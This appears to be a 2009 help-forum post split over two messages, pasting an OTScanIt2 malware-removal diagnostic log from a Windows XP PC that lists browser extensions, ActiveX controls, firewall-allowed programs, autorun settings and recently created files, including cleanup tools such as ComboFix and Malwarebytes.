{2670000A-7350-4f3c-8081-5663EE0C6C49}:{48E73304-E1D6-4330-914C-F5F514E3486C} [HKLM] -> %ProgramFiles%\Microsoft Office\Office12\ONBttnIE.dll [Menu: S&end to OneNote] -> [2007/12/13 01:20:58 | 00,606,288 | ---- | M] (Microsoft Corporation)
{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}:{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} [HKLM] -> %ProgramFiles%\Yahoo!\Common\yiesrvc.dll [Button: Yahoo! Services] -> [2006/10/31 15:29:16 | 00,198,136 | ---- | M] (Yahoo! Inc.)
{92780B25-18CC-41C8-B9BE-3C9C571A8263}:{FF059E31-CC5A-4E2E-BF3B-96E929D65503} [HKLM] -> %ProgramFiles%\Microsoft Office\OFFICE11\REFIEBAR.DLL [Button: Research] -> [2007/04/19 13:10:18 | 00,063,840 | ---- | M] (Microsoft Corporation)
{B13B4423-2647-4cfc-A4B3-C7D56CB83487}:{B13B4423-2647-4cfc-A4B3-C7D56CB83487} [HKLM] -> %ProgramFiles%\Hello\PicasaCapture.dll [Button: Share in Hello] -> [2005/01/11 21:09:26 | 00,303,104 | ---- | M] (Picasa, Inc.)
{B13B4423-2647-4cfc-A4B3-C7D56CB83487}:{B13B4423-2647-4cfc-A4B3-C7D56CB83487} [HKLM] -> %ProgramFiles%\Hello\PicasaCapture.dll [Menu: Share in H&ello] -> [2005/01/11 21:09:26 | 00,303,104 | ---- | M] (Picasa, Inc.)
{e2e2dd38-d088-4134-82b7-f2ba38496583}:Exec [HKLM] -> %SystemRoot%\network diagnostic\xpnetdiag.exe [Menu: @xpsp3res.dll,-20001] -> [2008/04/13 13:53:32 | 00,558,080 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}:Exec [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Button: Messenger] -> [2008/04/13 19:12:28 | 01,695,232 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}:Exec [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Menu: Windows Messenger] -> [2008/04/13 19:12:28 | 01,695,232 | ---- | M] (Microsoft Corporation)
< Internet Explorer Extensions [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\ ->
CmdMapping\\"{08B0E5C0-4FCB-11CF-AAA5-00401C608501}" [HKLM] -> [Reg Error: Value does not exist or could not be read.] -> File not found
CmdMapping\\"{39FD89BF-D3F1-45b6-BB56-3582CCF489E1}" [HKLM] -> [Reg Error: Key does not exist or could not be opened.] -> File not found
CmdMapping\\"{4528BBE0-4E08-11D5-AD55-00010333D0AD}" [HKLM] -> %ProgramFiles%\Yahoo!\Common\yhexbmesus.dll [&Yahoo! Messenger] -> [2005/05/11 16:06:02 | 00,316,552 | ---- | M] (Yahoo! Inc.)
CmdMapping\\"{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}" [HKLM] -> %ProgramFiles%\Yahoo!\Common\yiesrvc.dll [Yahoo! IE Services Button] -> [2006/10/31 15:29:16 | 00,198,136 | ---- | M] (Yahoo! Inc.)
CmdMapping\\"{B13B4423-2647-4cfc-A4B3-C7D56CB83487}" [HKLM] -> %ProgramFiles%\Hello\PicasaCapture.dll [IECmdExecute Class] -> [2005/01/11 21:09:26 | 00,303,104 | ---- | M] (Picasa, Inc.)
CmdMapping\\"{FB5F1910-F110-11d2-BB9E-00C04F795683}" [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/13 19:12:28 | 01,695,232 | ---- | M] (Microsoft Corporation)
< Internet Explorer Plugins [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\ ->
PluginsPageFriendlyName -> Microsoft ActiveX Gallery ->
PluginsPage -> http://activex.microsoft.com/controls/find.asp?ext=%s&mime=%s ->
Extension\.spop -> %ProgramFiles%\Internet Explorer\PLUGINS\NPDocBox.dll [] -> [2001/01/30 12:56:24 | 00,225,280 | ---- | M] (InterTrust Technologies Corporation, Inc.)
< Default Prefix > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix
"" -> http://
< Trusted Sites Domains [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> [Key] 5268 domain(s) found. ->
50 domain(s) and sub-domain(s) not assigned to a zone.
< Trusted Sites Ranges [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> [Key] 77 range(s) found. ->
< Trusted Sites Domains [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ -> [Key] 8909 domain(s) found. ->
56 domain(s) and sub-domain(s) not assigned to a zone.
< Trusted Sites Ranges [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ -> [Key] 77 range(s) found. ->
< Downloaded Program Files > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\ ->
{166B1BCA-3F9C-11CF-8075-444553540000} [HKLM] -> http://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab [Shockwave ActiveX Control] ->
{233C1507-6A77-46A4-9443-F871F945D258} [HKLM] -> http://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab [Shockwave ActiveX Control] ->
{474F00F5-3853-492C-AC3A-476512BBC336} [HKLM] -> http://picasaweb.google.com/s/v/19.13/uploader2.cab [UploadListView Class] ->
{4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} [HKLM] -> http://download.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab [McAfee.com Operating System Class] ->
{664088B0-6AF3-4514-AF9D-A0DC3A3DF24A} [HKLM] -> http://support.f-secure.com/ols3beta/fscax.cab [F-Secure Online Scanner 3.3] ->
{8AD9C840-044E-11D1-B3E9-00805F499D93} [HKLM] -> http://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab [Java Plug-in 1.6.0_12] ->
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C} [HKLM] -> http://fpdownload.macromedia.com/get/flashplayer/current/ultrashim.cab [Reg Error: Key does not exist or could not be opened.] ->
{9F1C11AA-197B-4942-BA54-47A8489BB47F} [HKLM] -> http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38194.4634259259 [Reg Error: Key does not exist or could not be opened.] ->
{B9191F79-5613-4C76-AA2A-398534BB8999} [HKLM] -> http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/yautocomplete.cab [YAddBook Class] ->
{BCC0FF27-31D9-4614-A68E-C18E1ADA4389} [HKLM] -> http://download.mcafee.com/molbin/shared/mcgdmgr/1,0,0,26/mcgdmgr.cab [DwnldGroupMgr Class] ->
{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA} [HKLM] -> http://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab [Java Plug-in 1.6.0_12] ->
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} [HKLM] -> http://java.sun.com/update/1.6.0/jinstall-1_6_0_12-windows-i586.cab [Java Plug-in 1.6.0_12] ->
{D27CDB6E-AE6D-11CF-96B8-444553540000} [HKLM] -> http://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab [Shockwave Flash Object] ->
{FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} [HKLM] -> https://secure.logmein.com/activex/ractrl.cab?lmi=100 [Performance Viewer Activex Control] ->
< DNS Name Servers [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Adapters\ ->
{6ECFF537-F61D-4349-87DE-F2462C3081A7} -> (1394 Net Adapter) ->
{885E16B9-8B02-4053-A329-443CCF42D831} -> (SMC EZ Card 10/100 PCI (SMC1211 Series)) ->
{A097EA18-8EC6-41D8-8547-971333B1751C} -> () ->
< AppInit_DLLs [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_DLLs ->
*AppInit_DLLs* -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_Dlls ->
C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL -> %ProgramFiles%\Google\Google Desktop Search\GoogleDesktopNetwork3.dll -> [2009/02/10 23:07:33 | 00,119,296 | ---- | M] (Google)
*MultiFile Done* -> ->
< Winlogon\Notify settings [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ ->
AtiExtEvent -> -> File not found
LMIinit -> %SystemRoot%\system32\LMIinit.dll -> [2008/10/17 14:07:09 | 00,087,352 | ---- | M] (LogMeIn, Inc.)
< Domain Profile Authorized Applications List > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List ->
"%windir%\Network Diagnostic\xpnetdiag.exe" -> C:\WINDOWS\network diagnostic\xpnetdiag.exe [%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000] -> [2008/04/13 13:53:32 | 00,558,080 | ---- | M] (Microsoft Corporation)
"%windir%\system32\sessmgr.exe" -> C:\WINDOWS\system32\sessmgr.exe [%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019] -> [2008/04/13 19:12:34 | 00,141,312 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Windows Live\Messenger\livecall.exe" -> C:\Program Files\Windows Live\Messenger\livecall.exe [C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)] -> [2007/10/02 16:18:24 | 00,304,488 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe" -> C:\Program Files\Windows Live\Messenger\msnmsgr.exe [C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger] -> [2007/10/18 10:34:02 | 05,724,184 | ---- | M] (Microsoft Corporation)
< Standard Profile Authorized Applications List > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List ->
"%windir%\Network Diagnostic\xpnetdiag.exe" -> C:\WINDOWS\network diagnostic\xpnetdiag.exe [%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000] -> [2008/04/13 13:53:32 | 00,558,080 | ---- | M] (Microsoft Corporation)
"%windir%\system32\sessmgr.exe" -> C:\WINDOWS\system32\sessmgr.exe [%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019] -> [2008/04/13 19:12:34 | 00,141,312 | ---- | M] (Microsoft Corporation)
"C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Google Talk Plugin\googletalkplugin.dll" -> C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Google Talk Plugin\googletalkplugin.dll [C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Google Talk Plugin\googletalkplugin.dll:*:Enabled:Google Talk Plugin] -> [2009/01/12 19:17:50 | 03,782,128 | ---- | M] (Google)
"C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Google Talk Plugin\googletalkplugin.exe" -> C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Google Talk Plugin\googletalkplugin.exe [C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Google Talk Plugin\googletalkplugin.exe:*:Enabled:Google Talk Plugin] -> [2009/01/12 18:10:32 | 00,083,440 | ---- | M] (Google)
"C:\Program Files\Common Files\McAfee\MNA\McNASvc.exe" -> C:\Program Files\Common Files\McAfee\MNA\McNASvc.exe [C:\Program Files\Common Files\McAfee\MNA\McNASvc.exe:*:Enabled:McAfee Network Agent] -> [2008/07/18 07:02:52 | 02,482,848 | ---- | M] (McAfee, Inc.)
"C:\Program Files\DropBox\DropBox\DropBox.exe" -> C:\Program Files\DropBox\DropBox\DropBox.exe [C:\Program Files\DropBox\DropBox\DropBox.exe:*:Enabled:DropBox] -> [2006/05/09 00:59:30 | 00,139,264 | ---- | M] (DropShots)
"C:\Program Files\Google\Google Talk\googletalk.exe" -> C:\Program Files\Google\Google Talk\googletalk.exe [C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk] -> [2007/01/01 16:22:02 | 03,739,648 | ---- | M] (Google)
"C:\Program Files\Messenger\msmsgs.exe" -> C:\Program Files\Messenger\msmsgs.exe [C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger] -> [2008/04/13 19:12:28 | 01,695,232 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Microsoft LifeCam\LifeCam.exe" -> C:\Program Files\Microsoft LifeCam\LifeCam.exe [C:\Program Files\Microsoft LifeCam\LifeCam.exe:*:Enabled:LifeCam.exe] -> [2008/04/25 12:04:44 | 00,140,320 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Microsoft LifeCam\LifeEnC2.exe" -> C:\Program Files\Microsoft LifeCam\LifeEnC2.exe [C:\Program Files\Microsoft LifeCam\LifeEnC2.exe:*:Enabled:LifeEnC2.exe] -> [2008/04/25 12:04:46 | 00,230,432 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Microsoft LifeCam\LifeExp.exe" -> C:\Program Files\Microsoft LifeCam\LifeExp.exe [C:\Program Files\Microsoft LifeCam\LifeExp.exe:*:Enabled:LifeExp.exe] -> [2008/04/25 12:02:08 | 00,160,800 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Microsoft LifeCam\LifeTray.exe" -> C:\Program Files\Microsoft LifeCam\LifeTray.exe [C:\Program Files\Microsoft LifeCam\LifeTray.exe:*:Enabled:LifeTray.exe] -> [2008/04/25 12:00:00 | 00,107,552 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE" -> C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE [C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote] -> [2008/05/21 04:54:40 | 01,022,496 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Morpheus\Morpheus.exe" -> C:\Program Files\Morpheus\Morpheus.exe [C:\Program Files\Morpheus\Morpheus.exe:*:Enabled:M5Shell] -> [2006/11/10 15:41:48 | 00,735,744 | ---- | M] (Streamcast Networks, Inc)
"C:\Program Files\Mozilla Firefox\firefox.exe" -> C:\Program Files\Mozilla Firefox\firefox.exe [C:\Program Files\Mozilla Firefox\firefox.exe:*:Enabled:Firefox] -> [2009/02/04 11:05:55 | 00,307,704 | ---- | M] (Mozilla Corporation)
"C:\Program Files\Support.com\bin\tgcmd.exe" -> C:\Program Files\Support.com\bin\tgcmd.exe [C:\Program Files\Support.com\bin\tgcmd.exe:*:Enabled:BellSouth Bulletin and Job processor] -> [2004/07/25 13:49:02 | 01,847,296 | ---- | M] (BellSouth)
"C:\Program Files\Windows Live\Messenger\livecall.exe" -> C:\Program Files\Windows Live\Messenger\livecall.exe [C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)] -> [2007/10/02 16:18:24 | 00,304,488 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe" -> C:\Program Files\Windows Live\Messenger\msnmsgr.exe [C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger] -> [2007/10/18 10:34:02 | 05,724,184 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Windows Media Player\wmplayer.exe" -> C:\Program Files\Windows Media Player\wmplayer.exe [C:\Program Files\Windows Media Player\wmplayer.exe:*:Disabled:Windows Media Player] -> [2006/10/18 21:46:20 | 00,064,000 | ---- | M] (Microsoft Corporation)
"C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -> C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe [C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe:*:Enabled:Yahoo! Messenger] -> [2007/01/19 12:49:28 | 04,670,968 | ---- | M] (Yahoo! Inc.)
"C:\Program Files\Yahoo!\Messenger\YServer.exe" -> C:\Program Files\Yahoo!\Messenger\YServer.exe [C:\Program Files\Yahoo!\Messenger\YServer.exe:*:Enabled:Yahoo! FT Server] -> [2007/01/19 12:49:30 | 00,091,640 | ---- | M] (Yahoo! Inc.)
< SafeBoot AlternateShell [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot ->
"AlternateShell" -> cmd.exe ->
< CDROM Autorun Setting [HKEY_LOCAL_MACHINE]> -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom ->
"AutoRun" -> 1 ->
"DisplayName" -> CD-ROM Driver ->
"ImagePath" -> %SystemRoot%\system32\drivers\cdrom.sys [System32\DRIVERS\cdrom.sys] -> [2008/04/13 13:40:46 | 00,062,976 | ---- | M] (Microsoft Corporation)
< Drives with AutoRun files > -> ->
C:\AUTOEXEC.BAT [SET PATH=C:\LAUREATE\SHARED | ] -> %SystemDrive%\AUTOEXEC.BAT [ NTFS ] -> [2008/07/13 23:13:27 | 00,000,029 | ---- | M] ()
C:\AUTOEXEC.OLD [] -> %SystemDrive%\AUTOEXEC.OLD [ NTFS ] -> [2004/07/25 05:05:26 | 00,000,000 | ---- | M] ()
< MountPoints2 [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 ->
\{2fd84b48-4ab8-11dd-a45e-0010b565f1d5}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2fd84b48-4ab8-11dd-a45e-0010b565f1d5}\Shell
\{2fd84b48-4ab8-11dd-a45e-0010b565f1d5}\Shell\\"" -> [AutoRun] -> File not found
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2fd84b48-4ab8-11dd-a45e-0010b565f1d5}\Shell\AutoRun
\{2fd84b48-4ab8-11dd-a45e-0010b565f1d5}\Shell\AutoRun\\"" -> [Auto&Play] -> File not found
[Files/Folders - Created Within 30 Days]
5 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp ->
6 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp ->
3 C:\Documents and Settings\David\Desktop\*.tmp files -> C:\Documents and Settings\David\Desktop\*.tmp ->
x73_lut.dat -> %ProgramFiles%\x73_lut.dat -> [2100/02/23 14:35:34 | 00,000,768 | ---- | C] ()
gtx73.ini -> %ProgramFiles%\gtx73.ini -> [2100/02/08 15:53:34 | 00,001,437 | ---- | C] ()
ACMonitor_X73.exe -> %ProgramFiles%\ACMonitor_X73.exe -> [2100/02/08 15:03:54 | 00,053,248 | ---- | C] (Silitek Corp.)
OTScanIt2 -> %UserProfile%\Desktop\OTScanIt2 -> [2009/02/13 08:16:10 | 00,000,000 | ---D | C]
OTScanIt2.exe -> %UserProfile%\Desktop\OTScanIt2.exe -> [2009/02/13 08:15:43 | 00,656,714 | ---- | C] ()
fsaua.data -> %SystemDrive%\fsaua.data -> [2009/02/12 15:15:32 | 00,000,000 | ---D | C]
Sun -> %ProgramFiles%\Sun -> [2009/02/12 11:20:39 | 00,000,000 | ---D | C]
RECYCLER -> %SystemDrive%\RECYCLER -> [2009/02/12 08:58:24 | 00,000,000 | -HSD | C]
SpyBotPosts.url -> %UserProfile%\Desktop\SpyBotPosts.url -> [2009/02/12 08:28:35 | 00,000,137 | ---- | C] ()
LastGood -> %SystemRoot%\LastGood -> [2009/02/12 04:36:53 | 00,000,000 | ---D | C]
New Microsoft Word Document.doc -> %UserProfile%\Desktop\New Microsoft Word Document.doc -> [2009/02/11 16:53:52 | 00,010,752 | ---- | C] ()
_OTMoveIt -> %SystemDrive%\_OTMoveIt -> [2009/02/11 11:36:54 | 00,000,000 | ---D | C]
imsins.BAK -> %SystemRoot%\imsins.BAK -> [2009/02/11 03:01:54 | 00,001,374 | ---- | C] ()
ComboFix -> %SystemDrive%\ComboFix -> [2009/02/10 22:52:10 | 00,000,000 | ---D | C]
Boot.bak -> %SystemDrive%\Boot.bak -> [2009/02/10 22:45:52 | 00,000,211 | ---- | C] ()
cmldr -> %SystemDrive%\cmldr -> [2009/02/10 22:45:48 | 00,260,272 | ---- | C] ()
cmdcons -> %SystemDrive%\cmdcons -> [2009/02/10 22:45:42 | 00,000,000 | ---D | C]
SWXCACLS.exe -> %SystemRoot%\SWXCACLS.exe -> [2009/02/10 22:42:27 | 00,212,480 | ---- | C] (SteelWerX)
SWREG.exe -> %SystemRoot%\SWREG.exe -> [2009/02/10 22:42:27 | 00,161,792 | ---- | C] (SteelWerX)
SWSC.exe -> %SystemRoot%\SWSC.exe -> [2009/02/10 22:42:27 | 00,136,704 | ---- | C] (SteelWerX)
sed.exe -> %SystemRoot%\sed.exe -> [2009/02/10 22:42:27 | 00,098,816 | ---- | C] ()
fdsv.exe -> %SystemRoot%\fdsv.exe -> [2009/02/10 22:42:27 | 00,089,504 | ---- | C] (Smallfrogs Studio)
grep.exe -> %SystemRoot%\grep.exe -> [2009/02/10 22:42:27 | 00,080,412 | ---- | C] ()
zip.exe -> %SystemRoot%\zip.exe -> [2009/02/10 22:42:27 | 00,068,096 | ---- | C] ()
Continued on Next Post.....
drrchrds
2009-02-13, 16:25
continued from last post.....
VFIND.exe -> %SystemRoot%\VFIND.exe -> [2009/02/10 22:42:27 | 00,049,152 | ---- | C] ()
NIRCMD.exe -> %SystemRoot%\NIRCMD.exe -> [2009/02/10 22:42:27 | 00,029,696 | ---- | C] (NirSoft)
Qoobox -> %SystemDrive%\Qoobox -> [2009/02/10 22:40:45 | 00,000,000 | ---D | C]
Google Earth.lnk -> %AllUsersProfile%\Desktop\Google Earth.lnk -> [2009/02/10 21:42:13 | 00,001,836 | ---- | C] ()
GoogleUpdateTaskMachine.job -> %SystemRoot%\tasks\GoogleUpdateTaskMachine.job -> [2009/02/10 21:14:11 | 00,000,882 | ---- | C] ()
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [2009/02/10 19:49:28 | 21,470,12608 | -HS- | C] ()
AntiVir PE Classic.lnk -> %AllUsersProfile%\Desktop\AntiVir PE Classic.lnk -> [2009/02/10 19:46:32 | 00,001,851 | ---- | C] ()
avgntdd.sys -> %SystemRoot%\System32\drivers\avgntdd.sys -> [2009/02/10 19:46:22 | 00,045,376 | ---- | C] (Avira GmbH)
avgntmgr.sys -> %SystemRoot%\System32\drivers\avgntmgr.sys -> [2009/02/10 19:46:22 | 00,022,336 | ---- | C] (Avira GmbH)
ssmdrv.sys -> %SystemRoot%\System32\drivers\ssmdrv.sys -> [2009/02/10 19:46:21 | 00,028,352 | ---- | C] (Avira GmbH)
avipbb.sys -> %SystemRoot%\System32\drivers\avipbb.sys -> [2009/02/10 19:46:19 | 00,075,072 | ---- | C] (Avira GmbH)
Avira -> %ProgramFiles%\Avira -> [2009/02/10 19:46:18 | 00,000,000 | ---D | C]
Avira -> %AllUsersProfile%\Application Data\Avira -> [2009/02/10 19:46:18 | 00,000,000 | ---D | C]
TEMP -> %AllUsersProfile%\Application Data\TEMP -> [2009/02/10 19:37:37 | 00,000,000 | ---D | C]
SpywareBlaster -> %ProgramFiles%\SpywareBlaster -> [2009/02/10 19:37:11 | 00,000,000 | ---D | C]
Device Detector 3.lnk -> %AllUsersProfile%\Start Menu\Programs\Startup\Device Detector 3.lnk -> [2009/02/09 15:06:43 | 00,001,650 | ---- | C] ()
OpenOffice.org 2.4.lnk -> %UserProfile%\Start Menu\Programs\Startup\OpenOffice.org 2.4.lnk -> [2009/02/09 15:06:42 | 00,000,876 | ---- | C] ()
Google Updater -> %AllUsersProfile%\Application Data\Google Updater -> [2009/02/08 10:56:38 | 00,000,000 | ---D | C]
Google Software Updater.job -> %SystemRoot%\tasks\Google Software Updater.job -> [2009/02/08 10:56:35 | 00,000,868 | ---- | C] ()
Google Updater.exe -> %UserProfile%\Desktop\Google Updater.exe -> [2009/02/08 10:55:47 | 01,038,992 | ---- | C] ()
Skype -> %UserProfile%\Desktop\Skype -> [2009/02/08 10:49:38 | 00,000,000 | ---D | C]
Wise Installation Wizard -> %CommonProgramFiles%\Wise Installation Wizard -> [2009/02/08 02:16:53 | 00,000,000 | ---D | C]
oueg.sys -> %SystemRoot%\System32\drivers\oueg.sys -> [2009/02/08 01:29:50 | 00,061,440 | ---- | C] ()
ERDNT -> %SystemRoot%\ERDNT -> [2009/02/07 01:49:24 | 00,000,000 | ---D | C]
ERUNT AutoBackup.lnk -> %UserProfile%\Start Menu\Programs\Startup\ERUNT AutoBackup.lnk -> [2009/02/07 01:49:01 | 00,000,767 | ---- | C] ()
NTREGOPT.lnk -> %UserProfile%\Desktop\NTREGOPT.lnk -> [2009/02/07 01:48:57 | 00,000,611 | ---- | C] ()
ERUNT.lnk -> %UserProfile%\Desktop\ERUNT.lnk -> [2009/02/07 01:48:57 | 00,000,592 | ---- | C] ()
ERUNT -> %ProgramFiles%\ERUNT -> [2009/02/07 01:48:56 | 00,000,000 | ---D | C]
Malwarebytes -> %AppData%\Malwarebytes -> [2009/02/07 01:05:51 | 00,000,000 | ---D | C]
mbam.sys -> %SystemRoot%\System32\drivers\mbam.sys -> [2009/02/07 01:05:41 | 00,015,504 | ---- | C] (Malwarebytes Corporation)
Malwarebytes' Anti-Malware.lnk -> %AllUsersProfile%\Desktop\Malwarebytes' Anti-Malware.lnk -> [2009/02/07 01:05:41 | 00,000,696 | ---- | C] ()
mbamswissarmy.sys -> %SystemRoot%\System32\drivers\mbamswissarmy.sys -> [2009/02/07 01:05:38 | 00,038,496 | ---- | C] (Malwarebytes Corporation)
Malwarebytes' Anti-Malware -> %ProgramFiles%\Malwarebytes' Anti-Malware -> [2009/02/07 01:05:37 | 00,000,000 | ---D | C]
Malwarebytes -> %AllUsersProfile%\Application Data\Malwarebytes -> [2009/02/07 01:05:37 | 00,000,000 | ---D | C]
HijackThis.lnk -> %UserProfile%\Desktop\HijackThis.lnk -> [2009/02/07 01:00:50 | 00,001,734 | ---- | C] ()
Trend Micro -> %ProgramFiles%\Trend Micro -> [2009/02/07 01:00:50 | 00,000,000 | ---D | C]
Malware Detection -> %UserProfile%\Desktop\Malware Detection -> [2009/02/07 01:00:27 | 00,000,000 | ---D | C]
Recent -> %UserProfile%\Recent -> [2009/02/06 19:56:59 | 00,000,000 | RH-D | C]
DLLs Removed 2-6-2009 -> %SystemRoot%\System32\DLLs Removed 2-6-2009 -> [2009/02/06 19:19:24 | 00,000,000 | ---D | C]
Prunnet.doc -> %UserProfile%\Desktop\Prunnet.doc -> [2009/02/06 07:09:11 | 00,026,624 | ---- | C] ()
~$runnet.doc -> %UserProfile%\Desktop\~$runnet.doc -> [2009/02/06 07:09:11 | 00,000,162 | -H-- | C] ()
delete this crap -> %SystemRoot%\System32\delete this crap -> [2009/02/04 22:23:23 | 00,000,000 | ---D | C]
SpillSpace -> %UserProfile%\Desktop\SpillSpace -> [2009/02/02 21:01:29 | 00,000,000 | ---D | C]
Colors-restored.mp3 -> %UserProfile%\Desktop\Colors-restored.mp3 -> [2009/02/01 09:57:57 | 02,259,456 | ---- | C] ()
XAMPP Control Panel.lnk -> %UserProfile%\Desktop\XAMPP Control Panel.lnk -> [2009/01/31 21:04:32 | 00,000,357 | ---- | C] ()
xampp -> %SystemDrive%\xampp -> [2009/01/31 20:39:02 | 00,000,000 | ---D | C]
xampp-win32-1.7.0-installer.exe -> %UserProfile%\Desktop\xampp-win32-1.7.0-installer.exe -> [2009/01/31 20:19:12 | 40,759,679 | ---- | C] ()
Menus you liked.doc -> %UserProfile%\Desktop\Menus you liked.doc -> [2009/01/30 21:05:43 | 00,024,576 | ---- | C] ()
Vintige-Bubble-Banner-1-27-.jpg -> %UserProfile%\Desktop\Vintige-Bubble-Banner-1-27-.jpg -> [2009/01/27 16:47:39 | 00,070,031 | ---- | C] ()
Bubbles-rpt.png -> %UserProfile%\Desktop\Bubbles-rpt.png -> [2009/01/27 16:32:28 | 00,051,865 | ---- | C] ()
Bubbles-rpt.psd -> %UserProfile%\Desktop\Bubbles-rpt.psd -> [2009/01/27 16:21:33 | 00,110,514 | ---- | C] ()
Bubbles.psd -> %UserProfile%\Desktop\Bubbles.psd -> [2009/01/27 16:16:40 | 00,112,812 | ---- | C] ()
